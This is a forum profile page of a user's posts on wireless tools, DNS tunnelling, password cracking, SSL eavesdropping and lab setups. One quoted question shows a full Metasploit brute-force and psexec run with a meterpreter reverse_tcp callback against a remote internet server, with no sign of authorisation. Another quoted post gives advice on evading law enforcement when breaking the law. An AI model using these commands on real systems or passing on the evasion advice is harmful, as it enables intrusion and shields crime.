Jump to content

Infiltrator

Dedicated Members
 View Profile  See their activity

  • Posts

    4,287

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Posts posted by Infiltrator

    How To Run Your Own DNS?

    in Everything Else

    Posted

    I know TOR is very slow, but you could use a chain of VPN servers, instead of a DNS server.

    It offers encryption and would increase your anonymity on the web too, but you would have to be careful with browser add-ons or plugins, as they can reveal your real IP address.

    Just a thought.

    How to use Wireless USB Alfa card on Backtrack Live CD or USB ?

    in Questions

    Posted

    Hello,

    I would like to know how to use wireless alfa card on backtrack Live CD or USB ? please suggest me if you have any idea.

    Regards

    Skorpinok.

    As Mr-Protocol stated, plug it in, then issue the command lsusb. It should display the name of your USB wireless adapter Alfa bla bla.

    If it does, the next thing you do, is type airmon-ng at the terminal. That will display your adapter chipset, interface name (eg wlan0) and your monitor interface (eg Mon0).

    Tunneling DNS Requests

    in Questions

    Posted · Edited by Infiltrator

    The ISP I'm buying internet from has 3 DNS servers listed when I do an ipconfig /all (I know, Windows.), 2 OpenDNS servers and a server on the Default Gateway. I'm trying to bypass their DNS servers, which block some sites due to restrictive policies, and I'm sure they're doing some snooping. I thought about DNS tunneling, but I think that would still be seen by the DNS on the default gateway. I currently have a VPS running SSH and a web proxy set up that I'm tunneling my web traffic through. However, DNS requests are still being handled by the Default Gateway. Is there any way to completely tunnel my DNS traffic to avoid using their DNS Servers? Thank you in advance.

    I would use the Firefox, "Network.proxy.socks remote dns" built in option.

    What it does is, it uses the remote DNS server, instead of your local ISP DNS servers to do the DNS queries or look ups.

    Now you can use your VPS DNS servers to handle all the DNS work.

    Deauth All

    in Security

    Posted

    Yeah, but if you use airmon-ng to start your card, I think it sets it to roam. I like setting airodump-ng with -c for channel number, then aireplay, will work on that channel, since I tend to use them in tandem anyway when either cracking wep or trying to capture WPA handshakes. I keep hearing about wifite though, will have to give that a try. Apparently works really well for various wifi attacks, including WPS(reaver), WEP and WPA handshake capturing. Not sure on the deauth stuff with it, but assume it has to do that to get the handshake and trigger replay attacks for IV's.

    I agree with you 100% and I do that too, that was just a suggestion though.

    Home Practice Network Penetration System

    in Hacks & Mods

    Posted

    You can only run your WIndows copy, unlicensed for 30 days. After the 30 days grace period is over, you must activate your Windows copy in order to continue using it. In addition, to avoid buying licenses, you can make several copies of your first virtual machine and run them, as if they were installed individually.

    That's what I did in the past, and was able to run them without any problems. Furthermore, you will need to change the hostname on each of the VMs, or you will get conflicting error messages, sayng that there is already another host on the network with this same name.

    How To Browse The Internet Like "spies"

    in Everything Else

    Posted

    Theres one thing she forgot to mention thats the key here, because SOMEONE is going to read her article and think "oh, I can just use a proxy, TOR, or a VPN, and I'm safe and anonymous", which really isn't true. At the very basic, all traffic will come back to you physically to your end point encrypted or not, its going to leave a trail in the packets and your MAC address is going to be in there somewhere. Your ISP, working with any number of law enforcment agencies, if they were doing deep packet inspection, taking control of the networks you proxied or VPN through, or even the TOR exit nodes(want a list of them?) could still find ways to sniff your identity. The only way to stay truly anonymous is 1, NEVER do these things from your home, 2, NEVER use your real MAC address when connecting to ANY network when using a service like TOR or a VPN. 3, Never use the same access point more than once and never in public view, near cameras, etc. 4, use live discs and don't keep a HDD or any storage media with you or on the machine in use other than the RAM in the machine. Cold boot attacks can work to freeze memory and try to extract and dump them, but thats going to only work if you get caught while in the act. A machine with no drives, no external media, can't keep records of your information unless the device is powered on. 5, NEVER login or connect to sites that are tied to your personally. If you are going to be anonymous, you need to make sure you keep it that way, and if someone tracking you, sees one of your sites you use logged into from Chicago one day, and Kansas the next, they at least know you are access the internet, and will just monitor all the sites you use, the email addresses you setup, etc. And lastly, 6, don't speak with, either online, or offline, to anyone, if or when you decide to go online about anything you are going to do, nor ever speak of it before or afterwards to anyone. If you are planning to do something that is against the law, you never speak of it. Ever. That in itself, no matter what you've tried to do to cover your tracks, is why people end up in jail. You can't be connected to something unless someone knows you are connected to it, so make damn sure, no one ever does, whether it be while doing it online, or offline. Bragging and blabbing about it across twitter, pastebin, IRC and the like, is why half these kids who think their "anonymous" end up in jail.

    Everything you do, generates a trail of bits, because if it didn't, traffic would have no way to know where to send it back to you. And while you can make it harder for people to put pieces of the puzzle together, you make it easier if you do all of this from your home, or the same location every tiime, even when using proxies, VPN's, TOR, SSH Tunnels and IRC bouncers, it can all be traced eventually, and if you stay in one place long enough, and someone with the time and resources truly wanted to get to you, they could.

    Bravo Digip. Follow these steps and I am sure they will have a hard time finding you.

    Deauth All

    in Security

    Posted

    Hi if I use Aireplay-ng -0 10 -a <mac of access point> name mon0 its scans on the wrong channel how do I ensure it scans on channel 1 say :unsure:

    if you are going to hack a singe wieless router, you can already set the channel to your adapter, by issuing this command.


    ifconfig wlan0 down

    iwconfig wlan0 channel 1

    ifconfig wlan0 up.
    [/CODE]

    Grrr Lost Backtrack 5 Root Pw

    in Questions

    Posted

    http://www.debuntu.o...ub#comment-1489 )

    I've actually had to do this before, and can't remember the exact steps I used with BackTrack, but it either of the above should do it.

    Yep, that's exactly what i had to do the other day, to reset my Backtrack password. That article Digip suggested, has all the steps outlined in it. Just follow them you can't go wrong.

    The other option, would be booting a Live CD, mounting the partitions and then chrooting into it, to change the password, this would be the easiest one.

    http://www.howtogeek.com/howto/linux/reset-your-ubuntu-password-easily-from-the-live-cd/

    Full Screen Oracle Vbox

    in Questions

    Posted

    Hello,

    So I have been running Backtrack 5 R3 in Oracle for a littlebit now and have not been able to get seamless mode to work, which is annoying. Then I tried running BT in vmware player and was able to at least change the screen resolution so that it fit the entire screen. But in Oracle I have not screen resolution settings, has anyone else had this problem? Anyone have any fixes?

    Be it Vmware or Virtualbox, you must always install the additional tools, if you want to adjust screen resolution or whatever.

    Secure Connection Between 2 Computers

    in Questions

    Posted

    Infiltrator,

    Thanks for the reply, but my problem/question is not the sqlinjection part, but a man in the middle attack or some way in wich a hacker could eaves drop on the connection.

    Rephrasing the original question:

    What are the ways someone can eavesdrop / change data on a SSL connection by being on-route of the packet or having the user computers infected?

    Roger brother, thank you for clearing that up. One way to eavesdrop on a SSL connection is using SSLstrip, part of the Backtrack OS. I would suggest reading up on that, if you are not familiar with the utility.

    Other methods, would be infecting the client side with a malware to intercept the SSL connection and then decrypt the messages.

    Here are some interesting articles for you to read.

    http://thehackernews.com/2012/04/90-ssl-sites-vulnerable-to-beast-ssl.html#sthash.cAHE3DbD.dpbs

    http://nbnl.globalwhelming.com/2011/09/20/researchers-cracked-ssl-internet-safe-https/

    http://www.marktaw.com/technology/HowlongdoesittaketocrackS.html

    Can You Let Me Know What Is The Problem With This Exploit?

    in Questions

    Posted

    Target OS: Windows 2003 SP2 EN

    Target public ip : XX.XX.XX.XX

    Target Open port: 445

    My OS: windows 7

    My public ip : YY.YY.YY.YY

    my local ip: 192.168.2.42

    my router SMC

    Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following:

    Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

    I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following

    msf> use scanner/smb/smb_login

    msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX

    rhosts => XX.XX.XX.XX

    msf auxiliary(smb_login) > set smbuser root

    smbuser => root

    msf auxiliary(smb_login) > set smbpass password

    smbpass => password

    msf auxiliary(smb_login) > run

    [*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce

    [-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.

    [-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)

    [-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)

    [*] Auth-User: "root"

    [+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following:

    msf > use exploit/windows/smb/psexec

    msf exploit(psexec) > set rhost XX.XX.XX.XX

    rhost => XX.XX.XX.XX

    msf exploit(psexec) > set smbuser root

    smbuser => root

    msf exploit(psexec) > set smbpass password

    smbpass => password

    msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

    payload => windows/meterpreter/reverse_tcp

    msf exploit(psexec) > set lhost YY.YY.YY.YY

    lhost => YY.YY.YY.YY

    msf exploit(psexec) > set lport 4444

    lport => 4444

    msf exploit(psexec) > exploit

    [-] Handler failed to bind to YY.YY.YY.YY:4444

    [*] Started reverse handler on 0.0.0.0:4444

    [*] Connecting to the server...

    [*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...

    [*] Uploading payload...

    [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

    but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above?

    I found something related to your problem, I don't know if you have seen it or not, but here's the URL.

    http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash

    Passwords

    in Hacks & Mods

    Posted

    Bruteforcing is the surefire method.

    Instead of CPU processed bruteforcing, we can process bruteforcing through the GPU in order to arrive at a rate of about 380M * 1.4M passwords per second, allowing us to guess a 7-character password in maybe 1-2 days. In this sense, the GPU works with a package called CUDA, available for downloading from nVidia. Certainly we would need to have the hashed versions of the passwords beforehand.

    Search for GPU CUDA BRUTEFORCE PASSWORDS or similar

    There are many paid and free projects that use bruteforcing processed on the GPU. I think this is what you wanted to know by your inquiry: "how the password crackers get the hash code".

    Cryptohaze is one of the projects which function in this way.

    https://www.cryptoha...multiforcer.php

    I personally like Cryptohaze a lot, but have found it to be slower than HashCat. CryptoHaze uses Nvidia, which is a lot slower than ATI in this respect, so I would recommend Hashcat instead. Hashcat also support distributed networking, which can push the performance envelop to the extreme.

    Secure Connection Between 2 Computers

    in Questions

    Posted · Edited by Infiltrator

    Let me elaborate my problem.

    I am thinking of making an online polling/voting system. I am a senior software engineer so I can secure the database and the web page from sql injections, xss, csrf and I'm also thinking of a secure system to 'anonymously' identify the user so he/she can vote once, BUT, my main problem is this:

    could a haker create some software to hijack the session or .... in order to steal the vote?

    Well, if you want to secure your database system against SQL Injection attacks, I would recommend using open source tools, such as SQLMap to attack your web application. If the tool is successful in pentrating your database, you will need to write better code, to address the security problem.

    The reason why websites are so vulnerable to these web based attacks, is because they are never 100% tested against these attacks in the first place. If they were, we wouldn't be seeing such an alarming rate of websites being exploited in this matter.

    Becoming Ccna Certified.

    in Questions

    Posted · Edited by Infiltrator

    You can still practice, all of what you learned in the LAB from your own PC. Of course, having all those Cisco gear gives you that hands on experience, but you can accomplish the same with Packet Tracer or GNS3.

    They are virtual network software, that allows you to create your own network environment and practice, as if you were doing with the real stuff.

    Once you have, all the nodes, routers and switches configured, you can then use them to simulate a real network. You can also configure the routers and switches via a terminal, just like how you would with a real Cisco router or switch.

    The only difference is that, you don't use a serial cable to connect your PC to the router or switch, it's all done via the console.

    In case you are wondering, I've also done my CCNA but it's been a while, I am planning on doing Network+, once I finish studying for my security+.

×
×
  • Create New...